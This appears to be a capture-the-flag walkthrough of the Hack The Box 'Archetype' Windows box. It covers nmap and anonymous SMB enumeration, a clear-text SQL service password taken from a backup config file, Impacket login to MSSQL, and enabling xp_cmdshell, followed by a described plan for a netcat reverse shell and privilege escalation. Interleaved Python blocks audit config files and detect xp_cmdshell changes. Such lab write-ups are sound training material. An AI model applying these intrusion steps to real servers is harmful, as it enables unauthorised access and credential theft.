Well done on reaching this point. From
now on the boxes become a bit more difficult in terms of steps, tool usage
and exploitation attempts, as they start to resemble the boxes
on the main HTB platform. Starting with Archetype, a Windows
machine, you get the chance to exploit a misconfiguration in Microsoft SQL
Server, try to obtain a reverse shell, and get familiar with the Impacket toolkit in order to attack some services further.
Enumeration
Performing a network scan to detect which ports are open is
an essential part of the enumeration process. It gives us
a better understanding of the attack surface so we can design targeted
attacks. As in most cases, we are going to use the well-known Nmap tool.
┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.33.197
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 11:23 IST
Nmap scan report for 10.129.33.197
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
|_ssl-date: 2021-12-27T06:05:12+00:00; +10m43s from scanner time.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.76 seconds
┌──(mrdev㉿mrdev)-[~]
└─$
We found that SMB ports are open and also that a Microsoft
SQL Server 2017 is running on port 1433.
Enumerate the SMB shares with the help of smbclient
We are going to enumerate SMB with
the tool smbclient, using the following options:
-N : No password (anonymous/null session)
-L : List the services (shares) available on the server
┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N -L \\\\10.129.33.197\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We located a couple of interesting shares. The ADMIN$ and
C$ shares cannot be accessed, as the Access Denied error states; however, we can try to
access and enumerate the backups share by using the following command:
┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N \\\\10.129.33.197\\backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 17:50:57 2020
.. D 0 Mon Jan 20 17:50:57 2020
prod.dtsConfig AR 609 Mon Jan 20 17:53:02 2020
5056511 blocks of size 4096. 2611130 blocks available
smb: \>
There is a file named prod.dtsConfig, which appears to be a
configuration file. We can download it to our local machine with the get
command for further offline inspection.
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
By reviewing the content of this configuration file, we spot
in clear text the password of the user ARCHETYPE\sql_svc, which is M3g4c0rp123, for the host ARCHETYPE. With the provided credentials we just need a way
to connect and authenticate to the MS-SQL server.
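A defender's counterpart to this finding, as an added example that is not part of the write-up: a small Python audit that parses an SSIS .dtsConfig and reports connection strings that store a password in clear text, without echoing the password itself. The sample file is constructed in the shape SSIS writes, not the file from the box, and its account name and password are made up.

```python
"""Audit an SSIS .dtsConfig for clear-text credentials (defensive check).

Added example, not part of the walkthrough. SAMPLE_DTSCONFIG is constructed
in the shape SSIS writes, not the file taken from the box; its account name
and password are made up. Findings never include the secret value itself.
"""
import xml.etree.ElementTree as ET

SECRET_KEYS = ("password", "pwd")  # connection-string keys that carry a secret

SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property" ValueType="String"
      Path="\\Package.Connections[Destination].Properties[ConnectionString]">
    <ConfiguredValue>Data Source=.;User ID=EXAMPLE\\svc_example;Password=ExamplePass1;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" ValueType="String"
      Path="\\Package.Connections[Source].Properties[ConnectionString]">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Catalog;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict with lower-cased keys."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = val.strip()
    return pairs

def audit_dtsconfig(xml_text):
    """One finding per weakness: the package path, the account it is for and
    the issue. Integrated Security (SSPI) connections carry no secret."""
    findings = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        path = cfg.get("Path", "")
        node = cfg.find("ConfiguredValue")
        if "ConnectionString" not in path or node is None or not node.text:
            continue
        pairs = parse_connection_string(node.text)
        user = pairs.get("user id") or pairs.get("uid")
        for key in SECRET_KEYS:
            if pairs.get(key):  # present and non-empty: password stored in clear
                findings.append({"path": path, "user": user, "issue": f"clear-text {key}"})
        if pairs.get("persist security info", "").lower() == "true":
            findings.append({"path": path, "user": user, "issue": "Persist Security Info=True"})
    return findings
```

Running the audit over a backup share before it is exposed is the check that would have caught the prod.dtsConfig finding above; the fix is to use Integrated Security or a package protection level that encrypts sensitive properties.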
Enumerate ARCHETYPE using Impacket
The Impacket toolkit includes a valuable Python script called
mssqlclient.py which offers exactly this functionality. But first, we should better
understand what Impacket is and how we can install it.
Visit the Impacket GitHub repository (easily found by searching for it), where you
can read all about this tool.
We provide the password we spotted previously in the
configuration file:
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
We successfully authenticated to the Microsoft SQL Server!
Foothold
After our successful connection, we run help to find out the
options of our SQL shell. The help output describes the basic functionality it offers.
SQL>help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL>
Gain Foothold from SQL Shell
First, we enable xp_cmdshell, which changes the configuration option from 0 to 1. Then we run
RECONFIGURE to apply the change.
SQL> enable_xp_cmdshell;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL>
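The INFO lines above are the same text SQL Server writes to its ERRORLOG, which gives defenders a cheap detection. As an added example that is not part of the write-up, this Python snippet parses constructed ERRORLOG lines and alerts when xp_cmdshell is enabled, and separately when it is enabled and then disabled again within minutes.

```python
"""Detect xp_cmdshell being switched on in SQL Server ERRORLOG lines.

Added example, not part of the write-up: the INFO messages the SQL shell printed
above are the same text SQL Server records in its error log, so defenders can alert
on them. The log lines below are constructed; timestamps and spids are made up.
"""
import re
from datetime import datetime

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+spid(?P<spid>\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
WATCHED = {"xp_cmdshell", "Ole Automation Procedures"}  # routes from T-SQL to OS commands

SAMPLE_ERRORLOG = """\
2021-12-27 06:04:58.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-12-27 06:04:58.11 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-12-27 06:05:03.40 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-12-27 06:06:00.00 spid60      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
"""

def parse_config_changes(log_text):
    """Yield (timestamp, spid, option, old, new) for every sp_configure change."""
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, int(m["spid"]), m["option"], int(m["old"]), int(m["new"])

def detect_enabled(log_text):
    """Alert on each watched option that is turned on (0 -> non-zero)."""
    return [{"time": ts.isoformat(sep=" "), "spid": spid, "option": opt}
            for ts, spid, opt, old, new in parse_config_changes(log_text)
            if opt in WATCHED and old == 0 and new != 0]

def detect_short_toggles(log_text, max_seconds=300):
    """Flag a watched option enabled and disabled again within max_seconds,
    the 'run a command, then switch it back off' pattern."""
    enabled_at, toggles = {}, []
    for ts, spid, opt, old, new in parse_config_changes(log_text):
        if opt in WATCHED and old == 0 and new != 0:
            enabled_at[opt] = ts
        elif opt in enabled_at and new == 0:
            delta = (ts - enabled_at.pop(opt)).total_seconds()
            if delta <= max_seconds:
                toggles.append({"option": opt, "spid": spid, "seconds_enabled": delta})
    return toggles
```

The same messages are also raised as TDS info messages to the client, so they can be captured by SQL Server Audit or Extended Events if the ERRORLOG is not collected centrally.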
The whoami command output reveals that the SQL Server is
also running in the context of the user ARCHETYPE\sql_svc. However, this
account doesn't seem to have administrative privileges on the host.
Now, we will attempt to get a stable reverse shell. We will
upload the nc64.exe binary to the target machine and execute an interactive
cmd.exe process connecting back to our listening port. We can download the binary from GitHub.
Next, copy this file to the htdocs directory of the XAMPP web server,
open the XAMPP control panel and start the Apache web server. My Apache server is running
on port 8080.
In order to upload the binary to the target system, we need
to find a suitable writable folder for it. We will be using PowerShell for this
task since it gives us many more features than the regular command prompt.
In order to use it, we will have to invoke it explicitly each time we want to execute a
command, until we get the reverse shell. To do that, we will use the -c
flag of powershell, which instructs PowerShell to execute the given command.
We will print the current working directory by using the pwd
command.
PEASS-ng (Privilege Escalation Awesome Scripts SUITE new generation) is a collection of privilege escalation tools and techniques for Windows and Linux/Unix systems. It provides scripts and binaries that aid in the process of escalating privileges on compromised machines.
On the target machine, we will execute the wget command in
order to download the program from our system. We will use PowerShell for all
our commands.
The output of the tool is long; among other things, it lists
history files, logs, and backups. From the output, we can observe that we have
SeImpersonatePrivilege, which is also vulnerable to the Juicy Potato exploit.
However, we can first check the two existing files where
credentials could possibly be found.
As this is a normal user account as well as a service
account, it is worth checking for frequently accessed files or executed commands.
To do that, we will read the PowerShell history file, which is the equivalent
of .bash_history for Linux systems. The file ConsoleHost_history.txt can be
located in this directory.
Now, navigate to the folder where the PowerShell history is stored.